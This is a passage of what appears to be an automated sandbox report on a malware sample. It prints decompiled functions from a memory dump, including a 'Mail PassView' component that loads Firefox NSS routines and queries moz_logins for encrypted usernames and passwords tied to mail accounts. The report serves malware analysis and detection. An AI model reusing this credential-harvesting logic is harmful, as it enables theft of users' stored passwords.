				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                                              0x0040e4a4
                                                                                              0x0040e4a7
                                                                                              0x0040e4af
                                                                                              0x0040e4cd
                                                                                              0x0040e4db
                                                                                              0x0040e4e8
                                                                                              0x0040e4f4
                                                                                              0x0040e4fd
                                                                                              0x0040e509
                                                                                              0x0040e515
                                                                                              0x0040e51f
                                                                                              0x0040e52a
                                                                                              0x0040e53e
                                                                                              0x0040e54c
                                                                                              0x0040e55d
                                                                                              0x0040e561
                                                                                              0x0040e566
                                                                                              0x0040e575
                                                                                              0x0040e581
                                                                                              0x0040e585
                                                                                              0x0040e58d
                                                                                              0x0040e591
                                                                                              0x0040e629
                                                                                              0x0040e62c
                                                                                              0x0040e638
                                                                                              0x0040e746
                                                                                              0x0040e74b
                                                                                              0x0040e757
                                                                                              0x0040e75b
                                                                                              0x0040e769
                                                                                              0x0040e780
                                                                                              0x0040e78a
                                                                                              0x0040e7d0
                                                                                              0x0040e7da
                                                                                              0x0040e819
                                                                                              0x0040e819
                                                                                              0x0040e649
                                                                                              0x0040e65a
                                                                                              0x0040e65e
                                                                                              0x0040e662
                                                                                              0x0040e66a
                                                                                              0x0040e69c
                                                                                              0x0040e6cc
                                                                                              0x0040e6e3
                                                                                              0x0040e6e8
                                                                                              0x0040e6f7
                                                                                              0x0040e715
                                                                                              0x0040e726
                                                                                              0x0040e72b
                                                                                              0x0040e72f
                                                                                              0x0040e73a
                                                                                              0x00000000
                                                                                              0x0040e662
                                                                                              0x0040e59a
                                                                                              0x0040e59c
                                                                                              0x0040e5a6
                                                                                              0x0040e5aa
                                                                                              0x0040e610
                                                                                              0x0040e614
                                                                                              0x0040e619
                                                                                              0x0040e61d
                                                                                              0x0040e621
                                                                                              0x0040e623
                                                                                              0x00000000
                                                                                              0x0040e623
                                                                                              0x0040e5b3
                                                                                              0x0040e5b7
                                                                                              0x0040e5de
                                                                                              0x0040e5e7
                                                                                              0x0040e5ee
                                                                                              0x0040e5f0
                                                                                              0x0040e5f0
                                                                                              0x0040e5ee
                                                                                              0x0040e5f4
                                                                                              0x0040e5ff
                                                                                              0x0040e604
                                                                                              0x0040e60c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 1703216249-3046471546
                                                                                              • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                              • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                              • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                              • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}


























                                                                                              0x004010e5
                                                                                              0x004010e8
                                                                                              0x004010e9
                                                                                              0x004010ed
                                                                                              0x004010f5
                                                                                              0x004010f7
                                                                                              0x004012b2
                                                                                              0x004012b9
                                                                                              0x004012f4
                                                                                              0x004012bb
                                                                                              0x004012d4
                                                                                              0x004012e3
                                                                                              0x004012e3
                                                                                              0x00401302
                                                                                              0x0040131a
                                                                                              0x0040132b
                                                                                              0x0040132d
                                                                                              0x00401335
                                                                                              0x00000000
                                                                                              0x004010fd
                                                                                              0x004010fd
                                                                                              0x004010fe
                                                                                              0x0040127d
                                                                                              0x00401280
                                                                                              0x00401284
                                                                                              0x00000000
                                                                                              0x0040128a
                                                                                              0x0040128d
                                                                                              0x00401290
                                                                                              0x00000000
                                                                                              0x00401296
                                                                                              0x0040129b
                                                                                              0x004012a7
                                                                                              0x00000000
                                                                                              0x004012a7
                                                                                              0x00401290
                                                                                              0x00401104
                                                                                              0x00401104
                                                                                              0x00401107
                                                                                              0x0040122e
                                                                                              0x00401230
                                                                                              0x00401233
                                                                                              0x0040125b
                                                                                              0x00401262
                                                                                              0x00000000
                                                                                              0x00401268
                                                                                              0x00401270
                                                                                              0x00401272
                                                                                              0x00401275
                                                                                              0x00000000
                                                                                              0x0040127b
                                                                                              0x00000000
                                                                                              0x0040127b
                                                                                              0x00401275
                                                                                              0x00401235
                                                                                              0x00401235
                                                                                              0x0040123a
                                                                                              0x00401248
                                                                                              0x00401250
                                                                                              0x00401250
                                                                                              0x0040110d
                                                                                              0x0040110d
                                                                                              0x00401112
                                                                                              0x004011a2
                                                                                              0x004011ab
                                                                                              0x004011b9
                                                                                              0x004011bc
                                                                                              0x004011bf
                                                                                              0x004011c1
                                                                                              0x004011c4
                                                                                              0x004011d1
                                                                                              0x004011d3
                                                                                              0x004011d6
                                                                                              0x004011f2
                                                                                              0x004011f9
                                                                                              0x00000000
                                                                                              0x004011ff
                                                                                              0x00401207
                                                                                              0x00401209
                                                                                              0x00401214
                                                                                              0x00401216
                                                                                              0x00401218
                                                                                              0x00000000
                                                                                              0x0040121e
                                                                                              0x00000000
                                                                                              0x0040121e
                                                                                              0x00401218
                                                                                              0x004011d8
                                                                                              0x004011d8
                                                                                              0x004011e7
                                                                                              0x00000000
                                                                                              0x004011e7
                                                                                              0x00401118
                                                                                              0x0040111a
                                                                                              0x0040133b
                                                                                              0x0040133b
                                                                                              0x0040133b
                                                                                              0x00401120
                                                                                              0x00401120
                                                                                              0x00401129
                                                                                              0x00401137
                                                                                              0x0040113a
                                                                                              0x0040113d
                                                                                              0x0040113f
                                                                                              0x00401142
                                                                                              0x00401154
                                                                                              0x0040116f
                                                                                              0x00401176
                                                                                              0x00000000
                                                                                              0x0040117c
                                                                                              0x00401184
                                                                                              0x00401186
                                                                                              0x00401191
                                                                                              0x00401193
                                                                                              0x00401195
                                                                                              0x00000000
                                                                                              0x0040119b
                                                                                              0x0040119b
                                                                                              0x00000000
                                                                                              0x0040119b
                                                                                              0x00401195
                                                                                              0x00401156
                                                                                              0x0040115c
                                                                                              0x0040115d
                                                                                              0x0040115d
                                                                                              0x00401160
                                                                                              0x00401167
                                                                                              0x00401169
                                                                                              0x00401169
                                                                                              0x00401154
                                                                                              0x0040111a
                                                                                              0x00401112
                                                                                              0x00401107
                                                                                              0x004010fe
                                                                                              0x00401341

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                              • String ID: Mail PassView
                                                                                              • API String ID: 3628558512-272225179
                                                                                              • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                              • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                              • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                              • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}























































                                                                                              0x0040ce30
                                                                                              0x0040ce38
                                                                                              0x0040ce41
                                                                                              0x0040ce45
                                                                                              0x0040ce48
                                                                                              0x0040ce4f
                                                                                              0x0040d1e9
                                                                                              0x0040d1e9
                                                                                              0x0040d1e9
                                                                                              0x0040ce55
                                                                                              0x0040ce58
                                                                                              0x0040ce5c
                                                                                              0x0040ce6a
                                                                                              0x0040ce5e
                                                                                              0x0040ce65
                                                                                              0x0040ce67
                                                                                              0x0040ce6f
                                                                                              0x0040d1d5
                                                                                              0x0040d1d7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d1dd
                                                                                              0x0040d1e3
                                                                                              0x00000000
                                                                                              0x0040ce75
                                                                                              0x0040ce7f
                                                                                              0x0040ce89
                                                                                              0x0040d1c9
                                                                                              0x0040d1c9
                                                                                              0x0040d1cc
                                                                                              0x0040d1d1
                                                                                              0x0040d1d3
                                                                                              0x0040d1d3
                                                                                              0x00000000
                                                                                              0x0040ce8f
                                                                                              0x0040ce9c
                                                                                              0x0040ce9f
                                                                                              0x0040cea6
                                                                                              0x0040ceb9
                                                                                              0x0040cebf
                                                                                              0x0040cec4
                                                                                              0x0040ced6
                                                                                              0x0040cef5
                                                                                              0x0040cefe
                                                                                              0x0040cf0b
                                                                                              0x0040cf0f
                                                                                              0x0040cf13
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cf1c
                                                                                              0x0040cf1f
                                                                                              0x0040cf33
                                                                                              0x0040cf36
                                                                                              0x0040cf36
                                                                                              0x00000000
                                                                                              0x0040cf39
                                                                                              0x0040cf3c
                                                                                              0x0040cf47
                                                                                              0x0040cf3e
                                                                                              0x0040cf41
                                                                                              0x0040cf44
                                                                                              0x0040cf4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cf62
                                                                                              0x0040cf68
                                                                                              0x0040cf7a
                                                                                              0x0040cf7f
                                                                                              0x0040cf94
                                                                                              0x0040cfa3
                                                                                              0x0040cfb3
                                                                                              0x0040cfc3
                                                                                              0x0040cfd3
                                                                                              0x0040cfe0
                                                                                              0x0040cfe3
                                                                                              0x0040cfed
                                                                                              0x0040cff3
                                                                                              0x0040cff7
                                                                                              0x0040d003
                                                                                              0x0040d009
                                                                                              0x0040d00d
                                                                                              0x0040d019
                                                                                              0x0040d01f
                                                                                              0x0040d023
                                                                                              0x0040d02f
                                                                                              0x0040d035
                                                                                              0x0040d039
                                                                                              0x0040d045
                                                                                              0x0040d04b
                                                                                              0x0040d04f
                                                                                              0x0040d05b
                                                                                              0x0040d061
                                                                                              0x0040d070
                                                                                              0x0040d076
                                                                                              0x0040d084
                                                                                              0x0040d08a
                                                                                              0x0040d08f
                                                                                              0x0040d09e
                                                                                              0x0040d0af
                                                                                              0x0040d0ba
                                                                                              0x0040d0bd
                                                                                              0x0040d0c9
                                                                                              0x0040d0cc
                                                                                              0x0040d0dd
                                                                                              0x0040d0e7
                                                                                              0x0040d0ed
                                                                                              0x0040d0fb
                                                                                              0x0040d101
                                                                                              0x0040d106
                                                                                              0x0040d106
                                                                                              0x0040d119
                                                                                              0x0040d12b
                                                                                              0x0040d136
                                                                                              0x0040d137
                                                                                              0x0040d13d
                                                                                              0x0040d13e
                                                                                              0x0040d143
                                                                                              0x0040d148
                                                                                              0x0040d163
                                                                                              0x0040d16a
                                                                                              0x0040d175
                                                                                              0x0040d181
                                                                                              0x0040d187
                                                                                              0x0040d18e
                                                                                              0x00000000
                                                                                              0x0040d18e
                                                                                              0x0040d150
                                                                                              0x0040d151
                                                                                              0x0040d157
                                                                                              0x0040d158
                                                                                              0x0040d161
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d190
                                                                                              0x0040d190
                                                                                              0x0040d193
                                                                                              0x0040d199
                                                                                              0x0040d1a5
                                                                                              0x0040d1a5
                                                                                              0x00000000
                                                                                              0x0040d1ac
                                                                                              0x0040d1af
                                                                                              0x0040d1b9
                                                                                              0x0040d1bc
                                                                                              0x0040d1c0
                                                                                              0x0040d1c5
                                                                                              0x0040d1c8
                                                                                              0x00000000
                                                                                              0x0040d1c0
                                                                                              0x0040ce89

                                                                                              APIs
                                                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                                • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                                • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                              • memset.MSVCRT ref: 0040CEA6
                                                                                              • memset.MSVCRT ref: 0040CEBF
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                              • memset.MSVCRT ref: 0040CF68
                                                                                              • memset.MSVCRT ref: 0040CF7A
                                                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                              • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                              • memset.MSVCRT ref: 0040D076
                                                                                              • memset.MSVCRT ref: 0040D08A
                                                                                              • memset.MSVCRT ref: 0040D0ED
                                                                                              • memset.MSVCRT ref: 0040D101
                                                                                              • sprintf.MSVCRT ref: 0040D119
                                                                                              • sprintf.MSVCRT ref: 0040D12B
                                                                                              • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                              Strings
                                                                                              • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                              • imap://%s, xrefs: 0040D125
                                                                                              • mailbox://%s, xrefs: 0040D113
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                              • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                              • API String ID: 4276617627-3913509535
                                                                                              • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                              • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
